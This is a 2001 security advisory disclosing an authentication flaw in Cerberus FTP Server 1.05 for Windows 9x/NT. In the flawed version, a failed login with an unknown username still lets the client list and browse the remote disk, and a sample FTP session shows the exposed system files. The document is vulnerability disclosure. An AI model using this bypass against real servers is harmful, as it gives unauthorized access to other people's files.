Andrisk Security Advisory  2# - Cerberus FTP Server 1.05

Topic: Cerberus FTP Server 1.05
Announced: 2001-04-25
Affects: Cerberus FTP Server 1.05
OS : Win9x/NT

I. Problem Description
**********************
Cerberus FTP Server 1.05 is an FTP server for Windows 9x/NT. A bug 
allows view any files from remote computer.

II. Impact
**************
When any user try to login with username that is not specified (or wrong) ftp server alowes : 
1. Remote client stay conected
2 .Remote client can view all files and browse directories of the remote computer 

Example 1:
--------
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Name (IP:root): aaaaaaaaa
530 Unknown user
ftp: Login failed.
Remote system type is WindowsNT.
ftp> ls
200 Port command received
150 Opening data connection
d---rwxrwx  1 100 84 0 Apr 29 2001 !!
----rwxrwx  1 100 84 0 Nov 22 2000 AUTOEXEC.BAT
-r--rwxrwx  1 100 84 289 Dec 25 2000 boot.ini
-r--rwxrwx  1 100 84 36 Nov 22 2000 CONFIG.SYS
-r--rwxrwx  1 100 84 4717 Jan 31 2001 ffastun.ffa
-r--rwxrwx  1 100 84 2113536 Jan 31 2001 ffastun.ffl
-r--rwxrwx  1 100 84 417792 Jan 31 2001 ffastun.ffo
-r--rwxrwx  1 100 84 3620864 Jan 31 2001 ffastun0.ffx
dr--rwxrwx  1 100 84 0 Apr 30 2001 ftproot
-r--rwxrwx  1 100 84 0 Oct 01 2000 IO.SYS
dr--rwxrwx  1 100 84 0 Apr 30 2001 mirc
-r--rwxrwx  1 100 84 0 Oct 01 2000 MSDOS.SYS
-r--rwxrwx  1 100 84 26816 Oct 01 2000 NTDETECT.COM
-r--rwxrwx  1 100 84 156496 Oct 01 2000 ntldr
-r--rwxrwx  1 100 84 579 Oct 28 2000 os240905.bin
-r--rwxrwx  1 100 84 578 Nov 16 2000 os560179.bin
-r--rwxrwx  1 100 84 163811328 Apr 27 2001 pagefile.sys
dr--rwxrwx  1 100 84 0 Apr 29 2001 Program Files
dr--rwxrwx  1 100 84 0 Apr 30 2001 rc5
dr--rwxrwx  1 100 84 0 Apr 19 2001 RECYCLER
dr--rwxrwx  1 100 84 0 Apr 30 2001 TEMP
dr--rwxrwx  1 100 84 0 Apr 29 2001 WINNT
-r--rwxrwx  1 100 84 1375 Apr 29 2001 winzip.log
226 Transfer complete
ftp> 

III. Solution
*************
At this time, no patch is available yet.

IV. Credits
***********
Bug discovered by Andris K <andris@talsi.teliamtc.lv>

Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p